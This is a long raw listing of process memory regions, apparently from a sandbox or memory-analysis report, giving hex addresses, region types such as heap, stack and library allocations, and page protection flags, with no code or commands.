heap
page read and write
44F000
heap
page read and write
46C000
heap
page read and write
372000
heap
page read and write
4420000
heap
page read and write
46D3000
heap
page read and write
1AF9F000
stack
page read and write
1B71B000
heap
page read and write
33F000
heap
page read and write
1A6A4000
heap
page execute and read and write
1B6DC000
stack
page read and write
1ADD6000
heap
page read and write
32D9000
heap
page read and write
42A0000
heap
page read and write
5905000
heap
page read and write
2250000
heap
page read and write
447E000
heap
page read and write
2BB2000
trusted library allocation
page read and write
1C55C000
stack
page read and write
7FE89BAD000
trusted library allocation
page read and write
473D000
heap
page read and write
1CA0000
heap
page read and write
408000
heap
page read and write
38C1000
heap
page read and write
7FE89A20000
trusted library allocation
page read and write
3D0000
heap
page read and write
326000
heap
page read and write
37A0000
trusted library allocation
page read and write
490000
heap
page read and write
46CE000
heap
page read and write
150000
trusted library allocation
page read and write
4A71000
heap
page read and write
3A2A000
heap
page read and write
7FE89843000
trusted library allocation
page read and write
3AC0000
trusted library allocation
page read and write
46C000
heap
page read and write
5831000
heap
page read and write
4509000
heap
page read and write
48A000
heap
page read and write
26E3000
trusted library allocation
page read and write
5A3000
direct allocation
page read and write
10000
heap
page read and write
23C000
stack
page read and write
7FE89814000
trusted library allocation
page read and write
4305000
heap
page read and write
10000
heap
page read and write
1A4EA000
stack
page read and write
13F1D000
trusted library allocation
page read and write
12374000
trusted library allocation
page read and write
7FE89BB0000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
7FE89BB0000
trusted library allocation
page read and write
452000
heap
page read and write
5854000
heap
page read and write
4B2000
heap
page read and write
28E000
heap
page read and write
33F000
heap
page read and write
4DE000
heap
page read and write
32C5000
heap
page read and write
305000
heap
page read and write
1B3CE000
stack
page read and write
33AB000
heap
page read and write
7FE89A00000
trusted library allocation
page read and write
437000
heap
page read and write
7FE89A00000
trusted library allocation
page execute and read and write
3349000
heap
page read and write
437C000
heap
page read and write
43F000
heap
page read and write
46D4000
heap
page read and write
4472000
heap
page read and write
39E8000
heap
page read and write
46CF000
heap
page read and write
10000
heap
page read and write
4B8000
heap
page read and write
1A6D0000
heap
page execute and read and write
4C4E000
heap
page read and write
1E50000
direct allocation
page read and write
4D1000
heap
page read and write
7FE899D0000
trusted library allocation
page execute and read and write
4C3000
heap
page read and write
22BB000
heap
page read and write
1B01C000
stack
page read and write
33A6000
heap
page read and write
1A42C000
stack
page read and write
1AB73000
heap
page read and write
33C7000
trusted library allocation
page read and write
450000
heap
page read and write
45B000
heap
page read and write
32A000
heap
page read and write
3128000
trusted library allocation
page read and write
380000
heap
page read and write
4301000
heap
page read and write
4F00000
heap
page read and write
1AFFE000
stack
page read and write
39F000
heap
page read and write
1DB0000
direct allocation
page read and write
4474000
heap
page read and write
3930000
trusted library allocation
page read and write
486000
heap
page read and write
32F000
heap
page read and write
33C7000
trusted library allocation
page read and write
2F0000
heap
page read and write
22E000
stack
page read and write
1B1DE000
stack
page read and write
4F00000
heap
page read and write
4474000
heap
page read and write
4C70000
trusted library allocation
page read and write
5958000
heap
page read and write
4299000
heap
page read and write
4299000
heap
page read and write
60D000
stack
page read and write
46C0000
heap
page read and write
7FE899C7000
trusted library allocation
page read and write
4BF000
heap
page read and write
5911000
heap
page read and write
7FE89803000
trusted library allocation
page execute and read and write
1B018000
heap
page read and write
1C314000
heap
page read and write
46CE000
heap
page read and write
4F34000
heap
page read and write
7FE89A08000
trusted library allocation
page read and write
19C000
stack
page read and write
620000
heap
page read and write
2920000
trusted library allocation
page read and write
2B88000
trusted library allocation
page read and write
7FE89A30000
trusted library allocation
page read and write
1C680000
heap
page read and write
599F000
heap
page read and write
203F000
stack
page read and write
3FF000
heap
page read and write
3BB000
direct allocation
page read and write
1B056000
heap
page read and write
4C0B000
heap
page read and write
3A3000
direct allocation
page read and write
46B9000
heap
page read and write
16F000
trusted library allocation
page read and write
1EE6000
heap
page read and write
3F6C000
stack
page read and write
12361000
trusted library allocation
page read and write
7FE89B94000
trusted library allocation
page read and write
4AF000
heap
page read and write
7FE89820000
trusted library allocation
page read and write
1A6D8000
heap
page execute and read and write
7FE89BC8000
trusted library allocation
page read and write
44F000
heap
page read and write
28B000
stack
page read and write
4562000
heap
page read and write
4D6000
heap
page read and write
2EE000
heap
page read and write
3910000
heap
page read and write
3FA5000
trusted library allocation
page read and write
24AF000
stack
page read and write
1B78D000
stack
page read and write
7FE89AB0000
trusted library allocation
page read and write
26E0000
trusted library allocation
page read and write
7FE89A70000
trusted library allocation
page read and write
486000
heap
page read and write
640000
heap
page read and write
1EF000
trusted library allocation
page read and write
1CA4000
heap
page read and write
47CF000
stack
page read and write
3FA0000
trusted library allocation
page read and write
39E6000
heap
page read and write
1EF0000
heap
page read and write
3FA5000
trusted library allocation
page read and write
5929000
heap
page read and write
1B47B000
heap
page read and write
7FE89B99000
trusted library allocation
page read and write
4C4000
heap
page read and write
4E4000
heap
page read and write
409000
heap
page read and write
7FE899D0000
trusted library allocation
page execute and read and write
3940000
trusted library allocation
page read and write
7FE89A20000
trusted library allocation
page read and write
1DD0000
direct allocation
page read and write
2F0000
heap
page read and write
389000
heap
page read and write
1B194000
heap
page read and write
3955000
heap
page read and write
46E000
heap
page read and write
52D000
heap
page read and write
12C70000
trusted library allocation
page read and write
391000
heap
page read and write
26D9000
trusted library allocation
page read and write
50DF000
heap
page read and write
3BF000
direct allocation
page read and write
7FE89910000
trusted library allocation
page execute and read and write
7FFFFF89000
trusted library allocation
page execute read
3A0C000
heap
page read and write
21E000
stack
page read and write
491000
heap
page read and write
1C43D000
heap
page read and write
7FE89810000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
452000
heap
page read and write
46CE000
heap
page read and write
3A19000
heap
page read and write
1C3F9000
heap
page read and write
290000
heap
page read and write
3940000
trusted library allocation
page read and write
36C000
heap
page read and write
7FE899A2000
trusted library allocation
page read and write
7FE89813000
trusted library allocation
page read and write
4C00000
trusted library allocation
page read and write
42A000
heap
page read and write
1DB0000
heap
page read and write
30B000
heap
page read and write
1A54A000
stack
page read and write
3FF000
trusted library allocation
page read and write
4540000
heap
page read and write
4BDF000
heap
page read and write
52C000
heap
page read and write
23B0000
trusted library allocation
page read and write
373A000
heap
page read and write
4BF000
heap
page read and write
2F4C000
trusted library allocation
page read and write
3914000
trusted library allocation
page read and write
1A4BD000
stack
page read and write
7FE89BAA000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
4C42000
heap
page read and write
550000
heap
page read and write
380000
heap
page read and write
266000
heap
page read and write
2150000
heap
page read and write
590000
heap
page read and write
41CB000
stack
page read and write
2470000
heap
page read and write
34F000
heap
page read and write
2C90000
remote allocation
page read and write
3358000
trusted library allocation
page read and write
1B05E000
stack
page read and write
250000
heap
page read and write
3FA5000
trusted library allocation
page read and write
10000
heap
page read and write
2F0000
heap
page read and write
1C120000
heap
page read and write
4557000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
2050000
heap
page read and write
7FE8984B000
trusted library allocation
page read and write
455B000
heap
page read and write
4C53000
heap
page read and write
1248F000
trusted library allocation
page read and write
336B000
trusted library allocation
page read and write
1C7AE000
stack
page read and write
4489000
heap
page read and write
26BF000
trusted library allocation
page read and write
4BC000
heap
page read and write
1B1C0000
heap
page read and write
7FE898CC000
trusted library allocation
page execute and read and write
7FE89B4D000
trusted library allocation
page read and write
403E000
stack
page read and write
474000
heap
page read and write
7FE898B6000
trusted library allocation
page read and write
1A63B000
heap
page read and write
2B27000
trusted library allocation
page read and write
33AE000
heap
page read and write
38B9000
heap
page read and write
4B35000
heap
page read and write
684000
heap
page read and write
3C0000
direct allocation
page read and write
4420000
heap
page read and write
427000
heap
page read and write
2B8C000
trusted library allocation
page read and write
445D000
heap
page read and write
3E1000
heap
page read and write
41EB000
trusted library allocation
page read and write
50DF000
heap
page read and write
480000
heap
page read and write
1C3C8000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
4303000
heap
page read and write
203E000
stack
page read and write
10000
heap
page read and write
499000
heap
page read and write
1A6A8000
heap
page execute and read and write
716000
heap
page read and write
4C7000
heap
page read and write
1A550000
heap
page read and write
2A3000
heap
page read and write
2F6D000
trusted library allocation
page read and write
57AF000
heap
page read and write
385000
heap
page read and write
7FFFFF20000
trusted library allocation
page execute and read and write
52D000
heap
page read and write
22A0000
heap
page read and write
7FE89BA6000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
26DE000
trusted library allocation
page read and write
1AA20000
heap
page read and write
4507000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
3C8000
heap
page read and write
7FE899CC000
trusted library allocation
page read and write
389000
heap
page read and write
3DE000
heap
page read and write
49A000
heap
page read and write
385000
heap
page read and write
7FFFFF81000
trusted library allocation
page execute read
59AA000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
2285000
heap
page read and write
334000
heap
page read and write
7FE898E6000
trusted library allocation
page read and write
2854000
trusted library allocation
page read and write
7FE89A60000
trusted library allocation
page read and write
1ACAE000
heap
page read and write
12466000
trusted library allocation
page read and write
250000
heap
page read and write
2F75000
trusted library allocation
page read and write
42C5000
heap
page read and write
7FE89920000
trusted library allocation
page execute and read and write
3E6000
heap
page read and write
4482000
heap
page read and write
3E6000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
36A000
heap
page read and write
3C2000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
1C060000
heap
page read and write
4491000
heap
page read and write
7FE898B0000
trusted library allocation
page read and write
480000
heap
page read and write
3328000
heap
page read and write
1C703000
heap
page read and write
2AEE000
trusted library allocation
page read and write
3FA0000
trusted library allocation
page read and write
1231F000
trusted library allocation
page read and write
385000
heap
page read and write
244000
heap
page read and write
19C000
stack
page read and write
591D000
heap
page read and write
10000
heap
page read and write
1B190000
heap
page read and write
3930000
trusted library allocation
page read and write
3FA5000
trusted library allocation
page read and write
464000
heap
page read and write
1AB09000
stack
page read and write
1A759000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page read and write
4EC1000
heap
page read and write
3A1F000
heap
page read and write
445A000
heap
page read and write
410000
direct allocation
page read and write
42C5000
heap
page read and write
1C90000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
890000
heap
page read and write
57F6000
heap
page read and write
44F000
heap
page read and write
42C3000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
14070000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
5C0000
direct allocation
page read and write
42B3000
heap
page read and write
4D1000
heap
page read and write
5780000
heap
page read and write
26C8000
trusted library allocation
page read and write
7FE898D6000
trusted library allocation
page execute and read and write
3F0000
trusted library allocation
page read and write
2F5F000
stack
page read and write
4C67000
heap
page read and write
2A1000
heap
page read and write
57D2000
heap
page read and write
43CE000
heap
page read and write
482000
heap
page read and write
E0000
heap
page read and write
1C481000
heap
page read and write
7FE89B8A000
trusted library allocation
page read and write
44FE000
heap
page read and write
292F000
trusted library allocation
page read and write
1A71F000
stack
page read and write
4BF000
heap
page read and write
473F000
heap
page read and write
3944000
heap
page read and write
42B4000
heap
page read and write
7FE899BC000
trusted library allocation
page read and write
3A11000
heap
page read and write
4B35000
heap
page read and write
3CFE000
stack
page read and write
33B6000
heap
page read and write
3BE000
heap
page read and write
410000
heap
page read and write
3A0000
direct allocation
page read and write
2F6D000
trusted library allocation
page read and write
400000
system
page execute and read and write
335A000
trusted library allocation
page read and write
40D000
heap
page read and write
710000
heap
page read and write
7FE89B25000
trusted library allocation
page read and write
1A6A4000
heap
page execute and read and write
7FFFFF88000
trusted library allocation
page readonly
38BF000
stack
page read and write
41EB000
trusted library allocation
page read and write
380000
heap
page read and write
3BE000
heap
page read and write
34F000
heap
page read and write
3FA5000
trusted library allocation
page read and write
4291000
heap
page read and write
437000
heap
page read and write
3364000
trusted library allocation
page read and write
3410000
heap
page read and write
43CE000
heap
page read and write
335F000
trusted library allocation
page read and write
2CE0000
heap
page read and write
3A17000
heap
page read and write
39E8000
heap
page read and write
7FE89A80000
trusted library allocation
page read and write
7FE898F6000
trusted library allocation
page execute and read and write
1C370000
heap
page read and write
7FE89A60000
trusted library allocation
page read and write
7FE89B8D000
trusted library allocation
page read and write
1A589000
stack
page read and write
39BD000
heap
page read and write
207E000
stack
page read and write
4F00000
heap
page read and write
1C93E000
stack
page read and write
33AB000
heap
page read and write
3E3C000
stack
page read and write
268E000
stack
page read and write
46D5000
heap
page read and write
3366000
trusted library allocation
page read and write
4509000
heap
page read and write
1A6000
heap
page read and write
3A0000
heap
page read and write
42A9000
heap
page read and write
4F3A000
heap
page read and write
4C00000
trusted library allocation
page read and write
3122000
trusted library allocation
page read and write
7FE89A04000
trusted library allocation
page read and write
8C4000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
45C000
system
page execute and read and write
700000
heap
page read and write
1A848000
heap
page read and write
33AE000
heap
page read and write
7FE899F0000
trusted library allocation
page execute and read and write
3D30000
heap
page read and write
84C000
heap
page read and write
110000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
2F72000
trusted library allocation
page read and write
7FE899A2000
trusted library allocation
page read and write
1C4D0000
heap
page read and write
451000
heap
page read and write
3AD000
heap
page read and write
4F2B000
heap
page read and write
1B240000
heap
page read and write
1C179000
heap
page read and write
35C000
heap
page read and write
447E000
heap
page read and write
12B1D000
trusted library allocation
page read and write
7FE89AD0000
trusted library allocation
page read and write
36A000
heap
page read and write
26B1000
trusted library allocation
page read and write
42B3000
heap
page read and write
336D000
trusted library allocation
page read and write
40F000
heap
page read and write
3F99000
trusted library allocation
page read and write
33C7000
trusted library allocation
page read and write
375000
heap
page read and write
1CF0000
heap
page read and write
3AF000
heap
page read and write
41EB000
trusted library allocation
page read and write
3C0000
heap
page read and write
57EA000
heap
page read and write
4AFA000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
18D000
stack
page read and write
160000
trusted library allocation
page read and write
1B08E000
stack
page read and write
26B7000
trusted library allocation
page read and write
51E000
heap
page read and write
7FE89A50000
trusted library allocation
page read and write
385000
heap
page read and write
7FE899F8000
trusted library allocation
page read and write
366000
heap
page read and write
44C000
heap
page read and write
28C000
heap
page read and write
122FF000
trusted library allocation
page read and write
2689000
trusted library allocation
page read and write
35C000
heap
page read and write
46B000
heap
page read and write
42FE000
heap
page read and write
32C0000
heap
page read and write
42FE000
heap
page read and write
46A000
heap
page read and write
7FE899A3000
trusted library allocation
page read and write
3CD000
heap
page read and write
328000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
4303000
heap
page read and write
4BA000
heap
page read and write
4C63000
heap
page read and write
7FE8986C000
trusted library allocation
page execute and read and write
4F2D000
heap
page read and write
459000
heap
page read and write
389000
heap
page read and write
3A7000
heap
page read and write
299C000
trusted library allocation
page read and write
3E0000
heap
page read and write
10000000
direct allocation
page read and write
3532000
heap
page read and write
1CF5000
heap
page read and write
1D90000
direct allocation
page read and write
335A000
trusted library allocation
page read and write
1A58F000
stack
page read and write
3945000
trusted library allocation
page read and write
1A7DC000
heap
page read and write
30F000
heap
page read and write
26EB000
trusted library allocation
page read and write
1B248000
heap
page read and write
28D9000
trusted library allocation
page read and write
2F63000
trusted library allocation
page read and write
1C2FF000
stack
page read and write
471000
heap
page read and write
12451000
trusted library allocation
page read and write
3358000
trusted library allocation
page read and write
219F000
stack
page read and write
41A000
heap
page read and write
396B000
heap
page read and write
335E000
trusted library allocation
page read and write
1B014000
heap
page read and write
36A000
heap
page read and write
33C7000
trusted library allocation
page read and write
208E000
stack
page read and write
33C7000
trusted library allocation
page read and write
7FE898AC000
trusted library allocation
page execute and read and write
4488000
heap
page read and write
47F000
heap
page read and write
4A70000
heap
page read and write
56F000
heap
page read and write
34E9000
trusted library allocation
page read and write
34F000
heap
page read and write
3930000
trusted library allocation
page read and write
7FE89916000
trusted library allocation
page execute and read and write
1A4B0000
heap
page execute and read and write
46B000
heap
page read and write
7FE89850000
trusted library allocation
page read and write
26BD000
trusted library allocation
page read and write
2200000
trusted library allocation
page execute read
7FE89BF0000
trusted library allocation
page read and write
1A68F000
stack
page read and write
7FE89A70000
trusted library allocation
page read and write
4C47000
heap
page read and write
36A000
heap
page read and write
7FE898C6000
trusted library allocation
page read and write
52B000
heap
page read and write
4485000
heap
page read and write
7FE897F2000
trusted library allocation
page read and write
2DD000
heap
page read and write
42BE000
heap
page read and write
1ABFD000
heap
page read and write
1A786000
heap
page read and write
7FE898F0000
trusted library allocation
page execute and read and write
2E8000
heap
page read and write
7FE8982B000
trusted library allocation
page read and write
50C000
heap
page read and write
10000
heap
page read and write
1C519000
heap
page read and write
4C4B000
heap
page read and write
1A590000
heap
page read and write
7FE899A0000
trusted library allocation
page read and write
4427000
heap
page read and write
7FE898B0000
trusted library allocation
page read and write
41F000
heap
page read and write
5848000
heap
page read and write
7FE89833000
trusted library allocation
page execute and read and write
4303000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
7FE899CC000
trusted library allocation
page read and write
1B244000
heap
page read and write
424000
heap
page read and write
366000
heap
page read and write
1AC000
stack
page read and write
1A76A000
heap
page read and write
4488000
heap
page read and write
1C33B000
heap
page read and write
3493000
direct allocation
page read and write
3F99000
trusted library allocation
page read and write
4AA000
heap
page read and write
4C5F000
heap
page read and write
445A000
heap
page read and write
3390000
trusted library allocation
page read and write
24F1000
trusted library allocation
page read and write
7FE89A10000
trusted library allocation
page read and write
504000
heap
page read and write
4C55000
heap
page read and write
1A984000
heap
page read and write
41F000
heap
page read and write
7FE898E0000
trusted library allocation
page read and write
366000
heap
page read and write
28E000
heap
page read and write
46CB000
heap
page read and write
441000
heap
page read and write
1A64F000
heap
page read and write
7FE89B74000
trusted library allocation
page read and write
235E000
stack
page read and write
366000
heap
page read and write
7FE89804000
trusted library allocation
page read and write
26C2000
trusted library allocation
page read and write
382000
heap
page read and write
381D000
heap
page read and write
3B0E000
stack
page read and write
9BE000
heap
page read and write
1A70E000
heap
page execute and read and write
26BE000
stack
page read and write
797000
heap
page read and write
4C67000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
336A000
trusted library allocation
page read and write
3978000
heap
page read and write
2331000
trusted library allocation
page read and write
4472000
heap
page read and write
406000
heap
page read and write
3E1000
heap
page read and write
380000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
588F000
heap
page read and write
3358000
trusted library allocation
page read and write
26BE000
trusted library allocation
page read and write
3C6000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
4B0000
heap
page read and write
336A000
trusted library allocation
page read and write
7FFFFF83000
trusted library allocation
page execute read
7FE89A80000
trusted library allocation
page read and write
420000
heap
page read and write
58F9000
heap
page read and write
45F000
heap
page read and write
7FE89B98000
trusted library allocation
page read and write
2591000
trusted library allocation
page read and write
26D8000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
3A8000
heap
page read and write
58A7000
heap
page read and write
1A759000
stack
page read and write
46D8000
heap
page read and write
1ABA5000
heap
page read and write
3A0D000
heap
page read and write
33C7000
trusted library allocation
page read and write
447E000
heap
page read and write
517000
heap
page read and write
437B000
heap
page read and write
449000
heap
page read and write
44FE000
heap
page read and write
7FE89BBC000
trusted library allocation
page read and write
32D4000
heap
page read and write
2F66000
trusted library allocation
page read and write
230000
heap
page read and write
3440000
heap
page read and write
329000
heap
page read and write
2AF0000
trusted library allocation
page read and write
1C0A5000
heap
page read and write
857000
heap
page read and write
1C3EC000
heap
page read and write
1AD4B000
stack
page read and write
2600000
remote allocation
page read and write
2AF000
heap
page read and write
56F000
heap
page read and write
478000
remote allocation
page execute and read and write
7FE89BC0000
trusted library allocation
page read and write
489000
heap
page read and write
3FA0000
trusted library allocation
page read and write
23E000
heap
page read and write
4427000
heap
page read and write
7FE899F2000
trusted library allocation
page read and write
448000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
42BE000
heap
page read and write
3A15000
heap
page read and write
210000
heap
page read and write
1A9BD000
stack
page read and write
3F2000
heap
page read and write
46B000
heap
page read and write
1ACD8000
heap
page read and write
116000
heap
page read and write
39BB000
heap
page read and write
200000
heap
page read and write
3326000
heap
page read and write
36DB000
heap
page read and write
1C0DB000
heap
page read and write
5A0000
direct allocation
page read and write
4C5F000
heap
page read and write
44C000
heap
page read and write
1C0A0000
heap
page read and write
3092000
trusted library allocation
page read and write
255D000
trusted library allocation
page read and write
23E0000
trusted library allocation
page read and write
4490000
heap
page read and write
21D0000
heap
page read and write
3A17000
heap
page read and write
3FC000
stack
page read and write
44D0000
heap
page read and write
3367000
trusted library allocation
page read and write
7FE898C0000
trusted library allocation
page read and write
4482000
heap
page read and write
41EB000
trusted library allocation
page read and write
2694000
trusted library allocation
page read and write
41EB000
trusted library allocation
page read and write
1C67D000
stack
page read and write
5BB000
direct allocation
page read and write
270000
heap
page read and write
1C1AE000
stack
page read and write
1A6D8000
heap
page execute and read and write
1AB40000
heap
page read and write
330000
heap
page read and write
33AE000
heap
page read and write
2FA000
heap
page read and write
3B8000
heap
page read and write
2F72000
trusted library allocation
page read and write
7FE89813000
trusted library allocation
page read and write
38AF000
stack
page read and write
33C7000
trusted library allocation
page read and write
7FE899B0000
trusted library allocation
page read and write
2A58000
trusted library allocation
page read and write
26EA000
trusted library allocation
page read and write
261000
heap
page read and write
7FE899D0000
trusted library allocation
page execute and read and write
2110000
heap
page read and write
268000
heap
page read and write
385000
heap
page read and write
1D90000
direct allocation
page read and write
4C4E000
heap
page read and write
7FE89B79000
trusted library allocation
page read and write
26D5000
trusted library allocation
page read and write
42C3000
heap
page read and write
336A000
trusted library allocation
page read and write
25C000
stack
page read and write
41EB000
trusted library allocation
page read and write
382000
heap
page read and write
7FE899B0000
trusted library allocation
page execute and read and write
3D0000
trusted library allocation
page read and write
46C8000
heap
page read and write
1A918000
stack
page read and write
3974000
heap
page read and write
20000
heap
page read and write
1AB9C000
heap
page read and write
10000
heap
page read and write
467000
heap
page read and write
4489000
heap
page read and write
489000
heap
page read and write
7FE899E0000
trusted library allocation
page execute and read and write
1CA0000
trusted library allocation
page read and write
4CE000
heap
page read and write
42C1000
heap
page read and write
1A6A0000
heap
page execute and read and write
42C5000
heap
page read and write
57BB000
heap
page read and write
1A84A000
stack
page read and write
4562000
heap
page read and write
1C570000
heap
page read and write
20000
heap
page read and write
875000
heap
page read and write
1B6E5000
heap
page read and write
1C40C000
heap
page read and write
41EB000
trusted library allocation
page read and write
1A988000
heap
page read and write
26DE000
trusted library allocation
page read and write
437B000
heap
page read and write
2280000
heap
page read and write
3ECB000
heap
page read and write
1D00000
heap
page read and write
384000
heap
page read and write
7FE898E6000
trusted library allocation
page execute and read and write
7FE89AA0000
trusted library allocation
page read and write
391D000
heap
page read and write
4C55000
heap
page read and write
2886000
trusted library allocation
page read and write
477000
heap
page read and write
36A000
heap
page read and write
41EB000
trusted library allocation
page read and write
2B00000
trusted library allocation
page read and write
7FE89B19000
trusted library allocation
page read and write
44D0000
heap
page read and write
3FA0000
trusted library allocation
page read and write
1AA30000
heap
page read and write
2320000
heap
page read and write
597B000
heap
page read and write
420000
heap
page read and write
2D0000
trusted library allocation
page read and write
4419000
heap
page read and write
3FA5000
trusted library allocation
page read and write
4F3A000
heap
page read and write
41EB000
trusted library allocation
page read and write
335A000
heap
page read and write
7FE89813000
trusted library allocation
page execute and read and write
440000
heap
page read and write
3197000
trusted library allocation
page read and write
4C55000
heap
page read and write
308000
heap
page read and write
474000
heap
page read and write
43CA000
heap
page read and write
2298000
heap
page read and write
1C51D000
heap
page read and write
1C493000
heap
page read and write
38E000
heap
page read and write
26B3000
trusted library allocation
page read and write
309000
heap
page read and write
12372000
trusted library allocation
page read and write
36FC000
trusted library allocation
page read and write
12321000
trusted library allocation
page read and write
3C8000
heap
page read and write
1AF1F000
stack
page read and write
4FC000
heap
page read and write
47C000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
43C6000
heap
page read and write
3010000
trusted library allocation
page read and write
7FE898C0000
trusted library allocation
page execute and read and write
1F5000
stack
page read and write
1A7A9000
stack
page read and write
4420000
heap
page read and write
1ADA0000
heap
page read and write
385000
heap
page read and write
4DA000
heap
page read and write
26E000
heap
page read and write
3651000
heap
page read and write
1C30A000
heap
page read and write
1C401000
heap
page read and write
3500000
trusted library allocation
page read and write
3A04000
heap
page read and write
2B0000
trusted library allocation
page read and write
488000
heap
page read and write
1CE0000
trusted library allocation
page read and write
3A29000
heap
page read and write
1BA0000
heap
page read and write
280E000
stack
page read and write
2706000
trusted library allocation
page read and write
489000
heap
page read and write
1B440000
heap
page read and write
470000
heap
page read and write
3A22000
heap
page read and write
4D6000
heap
page read and write
50F000
heap
page read and write
1CC0000
trusted library allocation
page read and write
1B680000
heap
page read and write
1D34000
heap
page read and write
1A81E000
heap
page execute and read and write
242000
heap
page read and write
12321000
trusted library allocation
page read and write
7FE898BC000
trusted library allocation
page execute and read and write
400000
system
page execute and read and write
5940000
heap
page read and write
1C300000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
4C0A000
heap
page read and write
50E3000
heap
page read and write
1C9E000
stack
page read and write | page guard
21BF000
stack
page read and write
7FE89A60000
trusted library allocation
page read and write
49F000
heap
page read and write
486000
heap
page read and write
486000
heap
page read and write
624000
heap
page read and write
42C7000
heap
page read and write
2653000
trusted library allocation
page read and write
7FE89B60000
trusted library allocation
page read and write
4509000
heap
page read and write
1D10000
trusted library allocation
page read and write
46D5000
heap
page read and write
2760000
trusted library allocation
page read and write
1AB0F000
heap
page read and write
3D0E000
stack
page read and write
28BC000
trusted library allocation
page read and write
3357000
heap
page read and write
33C7000
trusted library allocation
page read and write
3A0000
heap
page read and write
42A0000
heap
page read and write
2B74000
trusted library allocation
page read and write
3BD000
direct allocation
page read and write
2B8000
heap
page read and write
7FE899D2000
trusted library allocation
page read and write
5883000
heap
page read and write
1EB0000
heap
page read and write
2B90000
trusted library allocation
page read and write
3301000
heap
page read and write
42C1000
heap
page read and write
1A63F000
stack
page read and write
429C000
heap
page read and write
23E0000
heap
page read and write
7FE89A30000
trusted library allocation
page read and write
3195000
trusted library allocation
page read and write
4BDF000
heap
page read and write
355F000
stack
page read and write
414000
heap
page read and write
3FA5000
trusted library allocation
page read and write
7FE899F0000
trusted library allocation
page execute and read and write
29A4000
heap
page read and write
1AF1F000
stack
page read and write
3A1B000
heap
page read and write
3A1F000
heap
page read and write
50DF000
heap
page read and write
28FE000
stack
page read and write
39D000
heap
page read and write
44FA000
heap
page read and write
3930000
heap
page read and write
47E000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
25EF000
stack
page read and write
7FE89C00000
trusted library allocation
page read and write
3FA0000
trusted library allocation
page read and write
1C86C000
stack
page read and write
7FE89B20000
trusted library allocation
page read and write
1B81E000
stack
page read and write
7FE898E6000
trusted library allocation
page execute and read and write
382000
heap
page read and write
40A000
heap
page read and write
28C4000
trusted library allocation
page read and write
421000
heap
page read and write
108000
heap
page read and write
12311000
trusted library allocation
page read and write
1B58E000
stack
page read and write
234D000
trusted library allocation
page read and write
46B000
heap
page read and write
21E0000
heap
page execute and read and write
1A70E000
heap
page execute and read and write
7FE89A70000
trusted library allocation
page read and write
486000
heap
page read and write
4F37000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
3D0D000
stack
page read and write
3AB000
heap
page read and write
2E3E000
stack
page read and write
4AF8000
heap
page read and write
4491000
heap
page read and write
3363000
trusted library allocation
page read and write
7FE89AD0000
trusted library allocation
page read and write
3F99000
trusted library allocation
page read and write
33C9000
trusted library allocation
page read and write
2BB0000
trusted library allocation
page read and write
1ABBC000
heap
page read and write
450A000
heap
page read and write
1B030000
heap
page read and write
44A7000
heap
page read and write
39E5000
heap
page read and write
7FE899C7000
trusted library allocation
page read and write
3F99000
trusted library allocation
page read and write
88A000
heap
page read and write
2372000
heap
page read and write
39D4000
heap
page read and write
3670000
trusted library allocation
page execute
4290000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
172000
heap
page read and write
4270000
trusted library allocation
page read and write
7FE89A50000
trusted library allocation
page read and write
120000
heap
page read and write
3FA0000
trusted library allocation
page read and write
7FE89A40000
trusted library allocation
page read and write
12331000
trusted library allocation
page read and write
26EE000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page read and write
450D000
heap
page read and write
10000
heap
page read and write
7FE899E3000
trusted library allocation
page read and write
42BE000
heap
page read and write
2C90000
remote allocation
page read and write
36CA000
heap
page read and write
34F5000
trusted library allocation
page read and write
41EB000
trusted library allocation
page read and write
41EB000
trusted library allocation
page read and write
4297000
heap
page read and write
385000
heap
page read and write
3328000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
1C06D000
stack
page read and write
7FE89B20000
trusted library allocation
page read and write
58E2000
heap
page read and write
1A9AE000
stack
page read and write
4A3000
heap
page read and write
1D85000
heap
page read and write
4B9000
heap
page read and write
1CC0F000
stack
page read and write
3E3000
heap
page read and write
2336000
trusted library allocation
page read and write
366000
heap
page read and write
2CFC000
trusted library allocation
page read and write
1C370000
heap
page read and write
1DB5000
heap
page read and write
1A5F5000
heap
page read and write
4BB6000
heap
page read and write
47D000
heap
page read and write
7FE89B25000
trusted library allocation
page read and write
33B6000
heap
page read and write
2B8E000
trusted library allocation
page read and write
32D8000
heap
page read and write
2C05000
trusted library allocation
page read and write
42B8000
heap
page read and write
39F000
heap
page read and write
7FE898BC000
trusted library allocation
page execute and read and write
2F000
heap
page read and write
41EB000
trusted library allocation
page read and write
20000
heap
page read and write
4CE000
stack
page read and write
223D000
stack
page read and write
7FE89A40000
trusted library allocation
page read and write
1CB0000
heap
page read and write
46B5000
heap
page read and write
445D000
heap
page read and write
3CC000
stack
page read and write
7FE899F4000
trusted library allocation
page read and write
26BB000
trusted library allocation
page read and write
4690000
heap
page read and write
